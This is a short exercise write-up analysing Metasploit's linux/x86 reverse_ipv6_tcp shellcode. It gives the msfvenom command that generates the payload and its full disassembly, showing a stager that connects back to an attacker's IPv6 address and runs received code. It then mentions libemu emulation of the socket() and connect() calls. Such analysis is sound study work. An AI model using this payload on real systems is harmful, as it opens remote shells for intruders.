5.2 - REVERSE IPv6 TCP
- The shellcode analyzed in this excersise is reverse_ipv6_tcp, which purpose is to spawn a command shell and connect back to the attacker over IPv6 protocol.
- First, the ndisasm command disassembles the payload outputting the corresponding assembly language instructions and its opcodes:
root@kali:~# msfvenom -p linux/x86/shell/reverse_ipv6_tcp R |ndisasm -u -
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 77 bytes
00000000 31DB xor ebx,ebx
00000002 53 push ebx
00000003 43 inc ebx
00000004 53 push ebx
00000005 6A0A push byte +0xa
00000007 89E1 mov ecx,esp
00000009 6A66 push byte +0x66
0000000B 58 pop eax
0000000C CD80 int 0x80
0000000E 96 xchg eax,esi
0000000F 99 cdq
00000010 6800000000 push dword 0x0
00000015 68C0A8010C push dword 0xc01a8c0
0000001A 6800005EFE push dword 0xfe5e0000
0000001F 6800000000 push dword 0x0
00000024 68FE800000 push dword 0x80fe
00000029 52 push edx
0000002A 6668115C push word 0x5c11
0000002E 66680A00 push word 0xa
00000032 89E1 mov ecx,esp
00000034 6A1C push byte +0x1c
00000036 51 push ecx
00000037 56 push esi
00000038 89E1 mov ecx,esp
0000003A 43 inc ebx
0000003B 43 inc ebx
0000003C 6A66 push byte +0x66
0000003E 58 pop eax
0000003F CD80 int 0x80
00000041 89F3 mov ebx,esi
00000043 B60C mov dh,0xc
00000045 B003 mov al,0x3
00000047 CD80 int 0x80
00000049 89DF mov edi,ebx
0000004B FFE1 jmp ecx
- Launching the sctest command from libemu tools the emulation begins, and finally two syscalls, socket() and connect() are displayed:
- The image reverse_ipv6.dot is converted into reverse_ipv6.png:
- reverse_ipv6.png displays the phases of the shellcode, and the syscalls socket() and connect():
